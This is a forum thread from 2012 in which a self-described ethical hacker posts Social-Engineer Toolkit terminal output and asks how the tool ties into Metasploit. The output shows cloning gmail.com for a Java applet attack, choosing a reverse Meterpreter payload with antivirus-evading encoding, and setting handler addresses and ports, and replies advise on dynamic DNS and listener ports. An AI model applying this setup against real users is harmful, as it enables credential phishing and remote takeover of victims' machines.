Shinigami Posted June 28, 2012 Share Posted June 28, 2012 Hi, before i pose my query, I would like to introduce myself. I'm a CEH and ECSA for quite some time now. However I'm still learning and today I was just curious in understanding the routing on how SET is connected to the MSF. Question: To make things simple I'm copying the lines from the Terminal and I'll point out what I'm referring to. Setting up JavaApplet in S.E.T: 1) Java Applet Attack Method set:webattack>1 2) Site Cloner set:webattack>2 [-] NAT/Port Forwarding can be used in the cases where your SET machine is [-] not externally exposed and may be a different IP address than your reverse listener. set> Are you using NAT/Port Forwarding [yes|no]: y #####set:webattack> IP address to SET web server (this could be your external IP or hostname):***.***.***.***###### #####set:webattack> Is your payload handler (metasploit) on a different IP from your external NAT/Port FWD address [yes|no]:n####### [-] SET supports both HTTP and HTTPS [-] Example: http://www.thisisafakesite.com set:webattack> Enter the url to clone:https://gmail.com [*] Cloning the website: https://gmail.com [*] Malicious java applet website prepped for deployment What payload do you want to generate: Name: Description: 1) Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker 2) Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker set:payloads>2 Below is a list of encodings to try and bypass AV. Select one of the below, 'backdoored executable' is typically the best. 1) avoid_utf8_tolower (Normal) 16) Backdoored Executable (BEST) set:encoding>16 #####set:payloads> PORT of the listener [443]:##### [*] Generating x64-based powershell injection code... FIRST: The first HASHED line of code, "(this could be your external IP or hostname)". Can I use no-ip or other DNS instead of an IP Address here? For I have a Dynamic IP issue here. Since SET uses the IP to bind it to a HANDLER, where there is only REVERSE_TCP and no TCP_DNS. SECOND: The Second line of code following, I seriously don't understand this. If I put in a Local Static IP address in this field (after choosing 'yes'), would that make a difference? What would be the 'Correct' option if I were to practice this over the Internet? Would I use the PUBLIC-IP/DNS just like I used it for the option Before this one? & why would it ask for my HANDLER's IP when it generates its own Handler? Please elaborate this option thank you. THIRD: The last HASHED line that asks for a PORT, if I'm not wrong, this is the HANDLER's port? LASTLY: I configured the SET_CONFIG to use a specific WEB_PORT, say '5555', but when this JavaAppletServer initializes, it speaks on 8080 and 8081. So how do I run CredentialHarvester along side when they both are on different ports? Thankyou Quote Link to comment Share on other sites More sharing options...
Infiltrator Posted June 29, 2012 Share Posted June 29, 2012 FIRST: The first HASHED line of code, "(this could be your external IP or hostname)". Can I use no-ip or other DNS instead of an IP Address here? For I have a Dynamic IP issue here. Since SET uses the IP to bind it to a HANDLER, where there is only REVERSE_TCP and no TCP_DNS. If your external IP address is dynamic, than I'd use No-IP "hostname", if it's static I'd just use the IP. THIRD: The last HASHED line that asks for a PORT, if I'm not wrong, this is the HANDLER's port? Correct, when the target machine connects back to your attacker's machine, it will be looking for a port to connect to. The default port is 443 but it can be changed to any port you want. LASTLY: I configured the SET_CONFIG to use a specific WEB_PORT, say '5555', but when this JavaAppletServer initializes, it speaks on 8080 and 8081. So how do I run CredentialHarvester along side when they both are on different ports? It won't be possible to run both applications on the same ports, what you could do is have both apps running at the same time but on different ports. Quote Link to comment Share on other sites More sharing options...
Shinigami Posted June 29, 2012 Author Share Posted June 29, 2012 If your external IP address is dynamic, than I'd use No-IP "hostname", if it's static I'd just use the IP. Correct, when the target machine connects back to your attacker's machine, it will be looking for a port to connect to. The default port is 443 but it can be changed to any port you want. It won't be possible to run both applications on the same ports, what you could do is have both apps running at the same time but on different ports. Thank you! Very grateful for your response, very elaborate. Can you please explain the SECOND query I posted? Concerning the code where it asks if my Metasploit is running on the same IP or a different one. Should I use my Local IP here or Public again? Thanks again. Quote Link to comment Share on other sites More sharing options...
bobbyb1980 Posted June 29, 2012 Share Posted June 29, 2012 I believe the attack you're trying uses multiple handlers for different payloads and they'd each be running on different ports. Your config file should explain it. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.